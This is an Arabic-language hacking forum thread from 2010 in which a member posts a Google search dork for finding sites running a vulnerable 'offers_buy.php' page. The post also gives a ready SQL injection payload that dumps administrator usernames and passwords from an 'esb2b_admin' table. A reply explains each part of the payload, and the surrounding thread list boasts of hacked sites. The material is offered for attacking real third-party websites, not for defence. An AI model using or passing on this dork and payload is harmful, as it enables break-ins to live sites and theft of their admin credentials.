يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 05-02-2010, 07:03 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية D.r-HACKz
 

 

 
إحصائية العضو





D.r-HACKz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
D.r-HACKz is on a distinguished road

افتراضي دورك جديد ومواقع مصابة بالهبل


مرحبا بكم في اول موضوع لي في منتدى
بمناسبة مبروك علينا ستايل الجديد
هدا هو دروك

كود PHP:
allinurl:offers_buy.php?id
استغلال
كود PHP:
-9999+union+all+select+0,0,group_concat(es_admin_name,char(58),es_pwd)v3n0m,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+esb2b_admin-- 



],v; []d] ,l,hru lwhfm fhgifg

التوقيع

اي استفسار انا هنا

 

   

رد مع اقتباس
قديم 05-02-2010, 07:12 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
إحصائية العضو





هكر الجوف غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
هكر الجوف is on a distinguished road

افتراضي


كفوو :P


نبي له شرح لاهنت

   

رد مع اقتباس
قديم 05-02-2010, 07:17 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية D.r-HACKz
 

 

 
إحصائية العضو





D.r-HACKz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
D.r-HACKz is on a distinguished road

افتراضي


اخي كل شئ سهل اخي

التوقيع

اي استفسار انا هنا

 

   

رد مع اقتباس
قديم 05-03-2010, 04:37 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو






مستر داتا بيز غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
مستر داتا بيز is on a distinguished road

افتراضي


اسم الملف المصاب
allinurl:offers_buy.php
اسم المتغير
id=9999-
الاستغلال هو
الكتابه ع الماس

+union+all+select+

اما هذا
group_concat(es_admin_name,char(58),es_pwd)
ف Group_concat()
هوا الامر المستخدم للاستعلام عن عمودين او ثلاثه او اكتر اما
es_admin_name,char(58)
فهو جدول اليوزر
اما عمود اليوزر فهو
es_pwd
معنى الاصفر الى فى الاستخدام
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
المفروض انها الاعمدة المصابه
اما هذا
esb2b_admin
فهذا هو الجدول الرئيسى الذى يحوي عمود الباسوردات وعمود اليوزرات
الى هما

es_admin_name
و
es_pwd
اما From
فهذا كود الاستعلام الاولى للجدول حسب شرح الاخ فولكانو فى الدورة

تحياتى وسلمت يمناك على الاستغلال اخى الكريم

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغرة سهله جداً ومواقع مصابة بل هبل + هدية موقغ + شرح الثغرة لحق ياولد DannY.IraQi قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 273 02-09-2011 03:33 PM
دورك sql جديد love legend SQL قواعد البيانات 2 09-13-2010 04:34 PM
دورك جديد من اكتشافي .... يلي بدو يدعس يدخل Black-FoG SQL قواعد البيانات 11 07-20-2010 09:37 PM
دوورك من اكتشافي هنا ومواقع ماصبة كتيرة D.r-HACKz SQL قواعد البيانات 0 05-09-2010 02:42 PM
تم اختراق 10 ومواقع ولله الحمد انا وheader.man ThE g0bL!N Hackers Showoff 14 01-01-2009 06:45 PM


الساعة الآن 05:13 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0